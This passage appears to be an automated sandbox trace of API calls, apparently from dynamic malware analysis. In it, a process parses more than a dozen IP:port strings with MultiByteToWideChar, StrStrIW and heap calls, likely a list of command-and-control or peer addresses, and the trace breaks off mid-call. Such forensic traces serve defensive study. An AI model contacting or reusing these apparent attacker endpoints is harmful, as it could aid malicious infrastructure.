lpMultiByteStr=0x32e47d50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.453] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47d50, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=20 | out: lpWideCharStr="52.197.142.79:18945") returned 20 [0119.453] StrStrIW (lpFirst="52.197.142.79:18945", lpSrch=":") returned=":18945" [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e00 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49840 [0119.453] StrStrIW (lpFirst="18945", lpSrch=":") returned 0x0 [0119.453] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49e00, Size=0x10) returned 0x32e49ea0 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a040 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c30 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49c30 | out: hHeap=0x2150000) returned 1 [0119.453] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49ba0 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a040 | out: hHeap=0x2150000) returned 1 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49840 | out: hHeap=0x2150000) returned 1 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ea0 | out: hHeap=0x2150000) returned 1 [0119.453] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.453] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47f90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.454] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47f90, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="41.128.130.103:874") returned 19 [0119.454] StrStrIW (lpFirst="41.128.130.103:874", lpSrch=":") returned=":874" [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f00 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e498a0 [0119.454] StrStrIW (lpFirst="874", lpSrch=":") returned 0x0 [0119.454] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f00, Size=0x10) returned 0x32e49dc0 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49de0 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e495d0 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e495d0 | out: hHeap=0x2150000) returned 1 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e495d0 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49de0 | out: hHeap=0x2150000) returned 1 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e498a0 | out: hHeap=0x2150000) returned 1 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49dc0 | out: hHeap=0x2150000) returned 1 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.454] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47de0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.454] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47de0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="123.163.200.65:27144") returned 21 [0119.454] StrStrIW (lpFirst="123.163.200.65:27144", lpSrch=":") returned=":27144" [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49d80 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49a20 [0119.454] StrStrIW (lpFirst="27144", lpSrch=":") returned 0x0 [0119.454] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49d80, Size=0x10) returned 0x32e49ee0 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e00 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49960 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49960 | out: hHeap=0x2150000) returned 1 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c00 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e00 | out: hHeap=0x2150000) returned 1 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49a20 | out: hHeap=0x2150000) returned 1 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ee0 | out: hHeap=0x2150000) returned 1 [0119.454] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.454] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.454] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.454] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47e40, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="165.19.194.233:53414") returned 21 [0119.455] StrStrIW (lpFirst="165.19.194.233:53414", lpSrch=":") returned=":53414" [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49a50 [0119.455] StrStrIW (lpFirst="53414", lpSrch=":") returned 0x0 [0119.455] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49ee0, Size=0x10) returned 0x32e49ec0 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49780 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49780 | out: hHeap=0x2150000) returned 1 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49600 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ee0 | out: hHeap=0x2150000) returned 1 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49a50 | out: hHeap=0x2150000) returned 1 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ec0 | out: hHeap=0x2150000) returned 1 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.455] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48140, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.455] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e48140, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="126.163.205.68:28424") returned 21 [0119.455] StrStrIW (lpFirst="126.163.205.68:28424", lpSrch=":") returned=":28424" [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.455] StrStrIW (lpFirst="28424", lpSrch=":") returned 0x0 [0119.455] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49ee0, Size=0x10) returned 0x32e49e60 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c30 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49c30 | out: hHeap=0x2150000) returned 1 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49690 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ee0 | out: hHeap=0x2150000) returned 1 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49630 | out: hHeap=0x2150000) returned 1 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e60 | out: hHeap=0x2150000) returned 1 [0119.455] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.455] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47ea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.455] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.456] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47ea0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="203.122.230.41:40342") returned 21 [0119.456] StrStrIW (lpFirst="203.122.230.41:40342", lpSrch=":") returned=":40342" [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a040 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b10 [0119.456] StrStrIW (lpFirst="40342", lpSrch=":") returned 0x0 [0119.456] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a040, Size=0x10) returned 0x32e4a080 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ec0 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e496c0 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e496c0 | out: hHeap=0x2150000) returned 1 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49900 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ec0 | out: hHeap=0x2150000) returned 1 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49b10 | out: hHeap=0x2150000) returned 1 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a080 | out: hHeap=0x2150000) returned 1 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.456] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47f00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.456] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47f00, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="125.26.184.142:41732") returned 21 [0119.456] StrStrIW (lpFirst="125.26.184.142:41732", lpSrch=":") returned=":41732" [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f60 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e499f0 [0119.456] StrStrIW (lpFirst="41732", lpSrch=":") returned 0x0 [0119.456] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f60, Size=0x10) returned 0x32e49f80 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a080 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49a20 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49a20 | out: hHeap=0x2150000) returned 1 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49a20 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a080 | out: hHeap=0x2150000) returned 1 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499f0 | out: hHeap=0x2150000) returned 1 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f80 | out: hHeap=0x2150000) returned 1 [0119.456] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.456] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e480b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.456] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.456] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e480b0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="125.163.206.71:27656") returned 21 [0119.457] StrStrIW (lpFirst="125.163.206.71:27656", lpSrch=":") returned=":27656" [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e20 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.457] StrStrIW (lpFirst="27656", lpSrch=":") returned 0x0 [0119.457] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49e20, Size=0x10) returned 0x32e49fe0 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a060 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49bd0 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49bd0 | out: hHeap=0x2150000) returned 1 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49a50 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a060 | out: hHeap=0x2150000) returned 1 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49630 | out: hHeap=0x2150000) returned 1 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fe0 | out: hHeap=0x2150000) returned 1 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.457] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.457] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e47f30, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="215.82.176.217:58278") returned 21 [0119.457] StrStrIW (lpFirst="215.82.176.217:58278", lpSrch=":") returned=":58278" [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49d80 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.457] StrStrIW (lpFirst="58278", lpSrch=":") returned 0x0 [0119.457] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49d80, Size=0x10) returned 0x32e4a060 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49fe0 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49840 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49840 | out: hHeap=0x2150000) returned 1 [0119.457] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e496c0 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fe0 | out: hHeap=0x2150000) returned 1 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49630 | out: hHeap=0x2150000) returned 1 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a060 | out: hHeap=0x2150000) returned 1 [0119.457] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.458] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e480e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.458] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e480e0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=20 | out: lpWideCharStr="50.122.31.208:25750") returned 20 [0119.458] StrStrIW (lpFirst="50.122.31.208:25750", lpSrch=":") returned=":25750" [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a020 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.458] StrStrIW (lpFirst="25750", lpSrch=":") returned 0x0 [0119.458] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a020, Size=0x10) returned 0x32e49fe0 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a020 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e496f0 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e496f0 | out: hHeap=0x2150000) returned 1 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e496f0 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4a020 | out: hHeap=0x2150000) returned 1 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49630 | out: hHeap=0x2150000) returned 1 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fe0 | out: hHeap=0x2150000) returned 1 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.458] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e481a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.458] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e481a0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="144.40.229.9:52430") returned 19 [0119.458] StrStrIW (lpFirst="144.40.229.9:52430", lpSrch=":") returned=":52430" [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49f00 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.458] StrStrIW (lpFirst="52430", lpSrch=":") returned 0x0 [0119.458] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49f00, Size=0x10) returned 0x32e49ec0 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49dc0 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49720 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49720 | out: hHeap=0x2150000) returned 1 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49840 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49dc0 | out: hHeap=0x2150000) returned 1 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49630 | out: hHeap=0x2150000) returned 1 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ec0 | out: hHeap=0x2150000) returned 1 [0119.458] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.458] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e46b50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0119.458] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.459] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e46b50, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=22 | out: lpWideCharStr="227.205.171.134:26505") returned 22 [0119.459] StrStrIW (lpFirst="227.205.171.134:26505", lpSrch=":") returned=":26505" [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49d80 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49630 [0119.459] StrStrIW (lpFirst="26505", lpSrch=":") returned 0x0 [0119.459] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49d80, Size=0x10) returned 0x32e49f80 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49e00 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49720 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49720 | out: hHeap=0x2150000) returned 1 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49810 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49e00 | out: hHeap=0x2150000) returned 1 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49630 | out: hHeap=0x2150000) returned 1 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49f80 | out: hHeap=0x2150000) returned 1 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.459] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e49990, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.459] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e49990, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="127.163.204.69:28168") returned 21 [0119.459] StrStrIW (lpFirst="127.163.204.69:28168", lpSrch=":") returned=":28168" [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49da0 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e499f0 [0119.459] StrStrIW (lpFirst="28168", lpSrch=":") returned 0x0 [0119.459] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e49da0, Size=0x10) returned 0x32e49fe0 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49ee0 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49720 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49720 | out: hHeap=0x2150000) returned 1 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49c30 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49ee0 | out: hHeap=0x2150000) returned 1 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499f0 | out: hHeap=0x2150000) returned 1 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fe0 | out: hHeap=0x2150000) returned 1 [0119.459] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.459] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e499c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 21 [0119.459] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.459] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e499c0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=21 | out: lpWideCharStr="21.192.117.154:46299") returned 21 [0119.459] StrStrIW (lpFirst="21.192.117.154:46299", lpSrch=":") returned=":46299" [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a100 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49720 [0119.460] StrStrIW (lpFirst="46299", lpSrch=":") returned 0x0 [0119.460] RtlReAllocateHeap (Heap=0x2150000, Flags=0x8, Ptr=0x32e4a100, Size=0x10) returned 0x32e49fe0 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e49fa0 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49b10 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49b10 | out: hHeap=0x2150000) returned 1 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e49750 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fa0 | out: hHeap=0x2150000) returned 1 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49720 | out: hHeap=0x2150000) returned 1 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e49fe0 | out: hHeap=0x2150000) returned 1 [0119.460] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40730 | out: hHeap=0x2150000) returned 1 [0119.460] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e49cf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0119.460] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e40730 [0119.460] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x32e49cf0, cbMultiByte=-1, lpWideCharStr=0x32e40730, cchWideChar=19 | out: lpWideCharStr="1.20.170.218:49002") returned 19 [0119.460] StrStrIW 